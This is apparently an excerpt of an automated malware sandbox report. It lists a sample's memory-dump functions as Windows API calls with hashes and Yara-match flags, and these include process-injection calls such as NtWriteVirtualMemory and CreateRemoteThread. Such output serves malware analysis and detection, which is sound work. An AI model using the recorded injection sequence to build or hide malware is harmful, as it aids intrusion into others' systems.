                                                                                                                                        • Instruction Fuzzy Hash: A4019271200289AB9B01EF62DC80DBB37ADEF85755704442BFC0153212EBB9DD12DBBA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004447BC
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
                                                                                                                                          • Part of subcall function 0044178F: GetLastError.KERNEL32 ref: 004417DA
                                                                                                                                          • Part of subcall function 0044178F: WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
                                                                                                                                          • Part of subcall function 0044178F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
                                                                                                                                          • Part of subcall function 0044178F: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
                                                                                                                                          • Part of subcall function 0044178F: SetEndOfFile.KERNEL32(?), ref: 0044186A
                                                                                                                                          • Part of subcall function 0044178F: CloseHandle.KERNEL32(?), ref: 00441882
                                                                                                                                        • WaitForSingleObject.KERNEL32(00002710,?,00462CA4,.dll,00000000,00001000,00000000,00000000,?), ref: 004447DF
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00462CA4,.dll,00000000,00001000,00000000,00000000,?), ref: 00444801
                                                                                                                                        • GetLastError.KERNEL32(?,00462CA4,.dll,00000000,00001000,00000000,00000000,?), ref: 00444815
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3370347312-0
                                                                                                                                        • Opcode ID: 0f998f83147512ee32733a5a0d49be6018f7f4bd67d1abc7990726ba8ddf059c
                                                                                                                                        • Instruction ID: bbbc0b135fb7b7e2a13e02bdf29b5bc3d2b2bd050ab20c697866c6f11fd4c098
                                                                                                                                        • Opcode Fuzzy Hash: 0f998f83147512ee32733a5a0d49be6018f7f4bd67d1abc7990726ba8ddf059c
                                                                                                                                        • Instruction Fuzzy Hash: CCF0C235240204FBEB212F609C09F9E3B26AF45711F10892AFB06E51F1EBB594619B6F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,0044BD3B,000000FF,03BD8900,?,?,0044E94A,0000012B,03BD8900), ref: 00462DE5
                                                                                                                                        • GetLastError.KERNEL32(?,?,0044E94A,0000012B,03BD8900,?,?,00461E90,00000000,?), ref: 00462DF0
                                                                                                                                        • WaitNamedPipeA.KERNEL32(00002710), ref: 00462E12
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,0044E94A,0000012B,03BD8900,?,?,00461E90,00000000,?), ref: 00462E20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4211439915-0
                                                                                                                                        • Opcode ID: 313902c24326e1441ec7f1b50f11d3366573b384b0edf839813da5f3f4b1f7f8
                                                                                                                                        • Instruction ID: 62e388cef827f56a8e0088032fdd3ca03d85040984b6897f5e91f7deaecfe789
                                                                                                                                        • Opcode Fuzzy Hash: 313902c24326e1441ec7f1b50f11d3366573b384b0edf839813da5f3f4b1f7f8
                                                                                                                                        • Instruction Fuzzy Hash: 44F0C232601520BBD2301B65EC4CB8B7B55EB153A2F114A35F609EA2E0E6F24C40C6AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
                                                                                                                                        • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
                                                                                                                                        • memset.NTDLL ref: 0044D5B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemcpymemset
                                                                                                                                        • String ID: ss: *.*.*.*
                                                                                                                                        • API String ID: 4042389641-2676197480
                                                                                                                                        • Opcode ID: df3171190fdddb97b44a421865a89715484dc424cfbd1302033c83a6e323bd30
                                                                                                                                        • Instruction ID: b8e81cbf317c48a3244ff7e941e7e7c89c03e20362a3d99cb712bf364be1236d
                                                                                                                                        • Opcode Fuzzy Hash: df3171190fdddb97b44a421865a89715484dc424cfbd1302033c83a6e323bd30
                                                                                                                                        • Instruction Fuzzy Hash: 87E0E57390431167D6306AB69C88E4B3AADEBC8314B000A3BFD05D3205ED79C908C2B4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0044BE53
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044BE5D
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044BE85
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0044BEA3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 58946197-0
                                                                                                                                        • Opcode ID: 04bc6f0d46faa179056d075fcad0bf3911ff900af44570a5b8365e75b7b5b13a
                                                                                                                                        • Instruction ID: 2d55e1c5d912c2f08a49faf50d15d875c6aed1529e51840336ad3e0ca35e2885
                                                                                                                                        • Opcode Fuzzy Hash: 04bc6f0d46faa179056d075fcad0bf3911ff900af44570a5b8365e75b7b5b13a
                                                                                                                                        • Instruction Fuzzy Hash: C6F05E70600640DBE7208F69DD89F873BA4EB11700F10882AF945D72A1EBB4EC41DB1F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • wcstombs.NTDLL ref: 0045494A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,0000FFFF,?,?,?,?,00000000,00000000,?,?,0046E088,?,?,0044363D), ref: 00454966
                                                                                                                                          • Part of subcall function 0044966C: wcstombs.NTDLL ref: 0044972A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wcstombs$FreeHeap
                                                                                                                                        • String ID: |cF
                                                                                                                                        • API String ID: 2377541700-1942328551
                                                                                                                                        • Opcode ID: d3b1026177f3131d00ad962fa404b3d0f5ac4d6ba36d7d516dd43c1fbf3d9cc0
                                                                                                                                        • Instruction ID: 9ebf3630f1ff0382221a744e072f20ff76865ffd8a2c11dde79f9b2063108602
                                                                                                                                        • Opcode Fuzzy Hash: d3b1026177f3131d00ad962fa404b3d0f5ac4d6ba36d7d516dd43c1fbf3d9cc0
                                                                                                                                        • Instruction Fuzzy Hash: 6F3180B1500219EFCF219FA1C845A9F7B65FF8475AF10801AFD144A212C33999A8DF99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 004574A6
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 004574C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 3168844106-3652835401
                                                                                                                                        • Opcode ID: 9cbcc7684469f7586aa8f9aaa7a71862c9f6dca8c14f4e55b57e0cb45352416e
                                                                                                                                        • Instruction ID: 96b5751415b5d00cec8737c22f6f29174a676d04d238046b95c618f895505d52
                                                                                                                                        • Opcode Fuzzy Hash: 9cbcc7684469f7586aa8f9aaa7a71862c9f6dca8c14f4e55b57e0cb45352416e
                                                                                                                                        • Instruction Fuzzy Hash: 9F3180B0900605EFCB10DF96D8449ADBBF4FF08304B10853FE515A7261E738AA45CF9A
Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,00449D9E,?), ref: 00458809
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: ObjectSingleWait
• String ID: $7gF
• API String ID: 24740636-386812976
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: SystemTimewsprintf
• String ID: %02u:%02u:%02u
• API String ID: 425189169-982595855
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00450CB4: lstrlenW.KERNEL32(?,00000000,00000000,74B05520,?,?,004424EC,?), ref: 00450CC0
  • Part of subcall function 00450CB4: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,004424EC,?), ref: 00450CE8
  • Part of subcall function 00450CB4: memset.NTDLL ref: 00450CFA
• RegCloseKey.ADVAPI32(?), ref: 004576D8
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Closelstrlenmemcpymemset
• String ID: "nF$System
• API String ID: 958803494-2543878742
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 00446501
• HeapFree.KERNEL32(00000000,00000000), ref: 00446534
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Heap$AllocateFree
• String ID: |cF
• API String ID: 2488874121-1942328551
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 004509FF
• HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,00443498,?), ref: 00450A22
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Heap$AllocateFree
• String ID: acF
• API String ID: 2488874121-1731962052
Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0045D359
  • Part of subcall function 00447913: lstrlen.KERNEL32(?,00000000,00466A4C,74B05520,0045D37E,?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0044791D
  • Part of subcall function 00447913: lstrcpy.KERNEL32(00000000,?), ref: 00447941
  • Part of subcall function 00447913: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 00447948
  • Part of subcall function 00447913: lstrcat.KERNEL32(00000000,00000001), ref: 0044799F
• RegCloseKey.ADVAPI32(?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0045D387
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: CloseOpenlstrcatlstrcpylstrlen
• String ID: LjF
• API String ID: 1030596466-2255276606
Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(ACD,?,?,?,00444341,?), ref: 004656C6
• _aulldiv.NTDLL(ACD,?,00989680,00000000), ref: 004656E6
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Time$FileSystem_aulldiv
• String ID: ACD
• API String ID: 2806457037-620537770
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00466373
  • Part of subcall function 0046645E: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00440000), ref: 004664D7
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: ExceptionHelper2@8LoadRaise___delay
• String ID: 0dF$acF
• API String ID: 123106877-3337871158
Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 0046087A
• CloseHandle.KERNEL32(?,?,00000010,?,?,00000000,?,00000000), ref: 004608C5
• HeapFree.KERNEL32(00000000,000000FF,000000FF,00451154,00000000,?,004585EF,00000000,?,00000094,00000000,00000001,00000094,00000000,00000000,?), ref: 00460BAE
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00460DD0
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: CloseErrorFreeHandleHeapLastmemset
• String ID:
• API String ID: 2333114656-0
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004511FA: lstrlen.KERNEL32(00000000,?), ref: 00451253
  • Part of subcall function 004511FA: lstrlen.KERNEL32(?,?), ref: 00451271
  • Part of subcall function 004511FA: RtlAllocateHeap.NTDLL(00000000,74B06985,?), ref: 0045129A
  • Part of subcall function 004511FA: memcpy.NTDLL(00000000,00000000,00000000), ref: 004512B1
  • Part of subcall function 004511FA: HeapFree.KERNEL32(00000000,00000000), ref: 004512C4
  • Part of subcall function 004511FA: memcpy.NTDLL(00000000,?,?), ref: 004512D3
• GetLastError.KERNEL32 ref: 00452E63
  • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5B6
  • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5D6
  • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5E2
• HeapFree.KERNEL32(00000000,?), ref: 00452E7F
• HeapFree.KERNEL32(00000000,?), ref: 00452E90
• SetLastError.KERNEL32(00000000), ref: 00452E93
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
• String ID:
• API String ID: 2451549186-0
                                                                                                                                        • Opcode ID: 0c167ff5d8d1acc8ce6fb35b3478f39ed077ee13eb8459fac125db5b3d120cea
                                                                                                                                        • Instruction ID: 68f54da71d32707e2ef09746108598c7089aab439766a053074a2426b6466fd9
                                                                                                                                        • Opcode Fuzzy Hash: 0c167ff5d8d1acc8ce6fb35b3478f39ed077ee13eb8459fac125db5b3d120cea
                                                                                                                                        • Instruction Fuzzy Hash: 6B318932900108EFCF129F99CD4189EBFB5FF49311B00416BF915A2221D7B58E55DF99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045A977: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?), ref: 0045A99B
  • Part of subcall function 0045A977: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045A9AD
  • Part of subcall function 0045A977: wcstombs.NTDLL ref: 0045A9BB
  • Part of subcall function 0045A977: lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045A9DF
  • Part of subcall function 0045A977: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0045A9F4
  • Part of subcall function 0045A977: mbstowcs.NTDLL ref: 0045AA01
  • Part of subcall function 0045A977: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA13
  • Part of subcall function 0045A977: HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA2D
• GetLastError.KERNEL32 ref: 00455FE3
  • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5B6
  • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5D6
  • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5E2
• HeapFree.KERNEL32(00000000,?), ref: 00455FFF
• HeapFree.KERNEL32(00000000,?), ref: 00456010
• SetLastError.KERNEL32(00000000), ref: 00456013
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
• String ID:
• API String ID: 3867366388-0
• Opcode ID: f0b3e700ceb847b927c465a8a21a843c08898c3e6863e1c9056936b50d0307ab
• Instruction ID: de9c44983d1b4b3718f1bcec81e044c3c8b2f84953bbe7fd760671bf25c54f13
• Opcode Fuzzy Hash: f0b3e700ceb847b927c465a8a21a843c08898c3e6863e1c9056936b50d0307ab
• Instruction Fuzzy Hash: 36317836900108EFCF129F99CC408EEBFB5FF48321B01456AF915A2261D7758EA5DFA9
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: a8686173dd61a553bbca1607d9df8c4b2443ad1fc8e937cdd3fd2572bfcd19b0
• Instruction ID: 4e90a099d55fb56f60f5ffecb49767784f2bee4215fe293a0fe2a86b918c3b19
• Opcode Fuzzy Hash: a8686173dd61a553bbca1607d9df8c4b2443ad1fc8e937cdd3fd2572bfcd19b0
• Instruction Fuzzy Hash: 7621CD76500909BFDB209FA2DC809677B39FF09306704011AFD4596A42D73AE8B4CBDA
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(74B05520,00000008,?,00000000,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5), ref: 0045384A
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
  • Part of subcall function 0046628F: StrChrA.SHLWAPI(?,0000002F,00000000,74B05520,00453878,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60), ref: 0046629D
  • Part of subcall function 0046628F: StrChrA.SHLWAPI(?,0000003F,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5,00000008,?), ref: 004662A7
• memcpy.NTDLL(00000000,74B05520,74B05520,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000), ref: 004538A8
• lstrcpy.KERNEL32(00000000,00000000), ref: 004538B8
• lstrcpy.KERNEL32(00000000,74B05520), ref: 004538C4
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrcpy$AllocateHeaplstrlenmemcpy
• String ID:
• API String ID: 3767559652-0
• Opcode ID: fd7d9bc784a57982a24b259c991cb3c95603c23b54c957930852614ca9833cbc
• Instruction ID: ef34d5f5792f8768f3f275ac2900e80723fba94c698835b2abe68d3244445f8b
• Opcode Fuzzy Hash: fd7d9bc784a57982a24b259c991cb3c95603c23b54c957930852614ca9833cbc
• Instruction Fuzzy Hash: FD21D272504215BFCB116F65CC58AAB7FE8AF053C6F15446AFC049B202EA39DA08D7A5
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 46406bc6ba4a5c6106ab340b2283113b2a524d34b55f8ae27d873ba0cb1a0ff6
• Instruction ID: 782232096d5aa84da9a2f66b046b0ca7c147a1f04da39f1c736fb1b7b91bed5d
• Opcode Fuzzy Hash: 46406bc6ba4a5c6106ab340b2283113b2a524d34b55f8ae27d873ba0cb1a0ff6
• Instruction Fuzzy Hash: CC11C172500909BFE7209F92DC40A57B778FF09308B00061AFA4591981D736F9B5DBE9
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?,74B481D0,77E2EEF0,00444439,00470449,?), ref: 00441711
• lstrlen.KERNEL32(?), ref: 00441719
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• lstrcpy.KERNEL32(00000000,?), ref: 00441730
• lstrcat.KERNEL32(00000000,?), ref: 0044173B
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$AllocateHeaplstrcatlstrcpy
• String ID:
• API String ID: 74227042-0
• Opcode ID: 69f85f6e1582973d590fe80703df6b3649c20f4ee67ddfff8daf302f156a422c
• Instruction ID: 11e00656ec1c7d06dc55a81e32f496be1f6fa217466ae87c1841441719ce0293
• Opcode Fuzzy Hash: 69f85f6e1582973d590fe80703df6b3649c20f4ee67ddfff8daf302f156a422c
• Instruction Fuzzy Hash: A4E01233505621AB8B126B64AC08C8FBBA9FF88350705492AF54093120DF75D819CB96
Uniqueness

Uniqueness Score: -1.00%

Executed Functions

Memory Dump Source
• Source File: 00000019.00000003.368982619.0000022A92C90000.00000010.00000001.sdmp, Offset: 0000022A92C90000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction ID: 7449731305f2fc08fb06f6237249f2db8b14d6ef435b223f7342364bc7a7b90f
• Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction Fuzzy Hash: FC9002094D640666D51411D20C4935C50406388250FD44480441690544D58E03D6D153
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

Strings
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
• Instruction ID: d6bc2c4d2378e74a265c5770f834e54c2bf23025d7fda2e14221a71acc3765ab
• Opcode Fuzzy Hash: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
• Instruction Fuzzy Hash: 3112723171CE0A8FDB59EF68D885BA673E1FB98311F40462DE44AC3251DF34E9459B81
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: InformationQueryToken$Close
• String ID: 0
• API String ID: 459398573-4108050209
• Opcode ID: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
• Instruction ID: eeff9be7b0f43e851f656a5e8d4232c7e0c628b544bcb7165a27e57d9adaa216
• Opcode Fuzzy Hash: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
• Instruction Fuzzy Hash: CA311970618B488FD764EF19D8C5B9AB7E6FBD8301F40493EE58AC3250DB349A05CB42
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: Virtual$AllocCreateFreeHeap
• String ID:
• API String ID: 2341667014-0

APIs
• NtSetInformationProcess.NTDLL ref: 00FBF62A
• CreateRemoteThread.KERNELBASE ref: 00FBF6DA
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: CreateInformationProcessRemoteThread
• String ID:
• API String ID: 3020566308-0

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: CreateMutexNameUser
• String ID:
• API String ID: 3764123871-0

APIs
• NtCreateSection.NTDLL ref: 00FB3A1E
  • Part of subcall function 00FBFFCC: NtMapViewOfSection.NTDLL ref: 00FC0018
Strings
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: Section$CreateView
• String ID: 0
• API String ID: 1585966358-4108050209

APIs
• NtAllocateVirtualMemory.NTDLL ref: 00FABAF1
Strings
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: AllocateMemoryVirtual
• String ID: @
• API String ID: 2167126740-2766056989

APIs
• NtProtectVirtualMemory.NTDLL ref: 00FE127A
• NtProtectVirtualMemory.NTDLL ref: 00FE1309
Memory Dump Source
• Source File: 00000023.00000002.853091429.0000000000FE1000.00000040.00000001.sdmp, Offset: 00FE1000, based on PE: false
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0

APIs
• NtQueryInformationProcess.NTDLL ref: 00FCAE49
  • Part of subcall function 00FACCA0: NtReadVirtualMemory.NTDLL ref: 00FACCBF
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: InformationMemoryProcessQueryReadVirtual
• String ID:
• API String ID: 1498878907-0

APIs
• NtQueryInformationProcess.NTDLL ref: 00FB1AEA
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: SectionView
• String ID:
• API String ID: 1323581903-0

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: MemoryReadVirtual
• String ID:
• API String ID: 2834387570-0

APIs
• NtWriteVirtualMemory.NTDLL ref: 00FB384F
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0

APIs
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: ProtectThreadVirtual$ResumeSuspend
• String ID:
• API String ID: 3483329683-0

APIs
• CreateFileA.KERNELBASE ref: 00FBE999
• SetFilePointer.KERNELBASE ref: 00FBE9B3
• ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC6B1C), ref: 00FBE9D5
• FindCloseChangeNotification.KERNELBASE ref: 00FBE9F0
Memory Dump Source
• Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
Similarity
• API ID: File$ChangeCloseCreateFindNotificationPointerRead
• String ID:
• API String ID: 2405668454-0
                                                                                                                                        • Opcode ID: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                        • Instruction ID: f4e5e480c4bae5703083fe3d9a8f2b92028a96bd2fde7f1c84adce9cccd1719a
                                                                                                                                        • Opcode Fuzzy Hash: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                        • Instruction Fuzzy Hash: 36410C30218A184FDB58DF28DCC5AA977E1FB88315B24866DE19BC7266DF34D447CB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FC0FF5
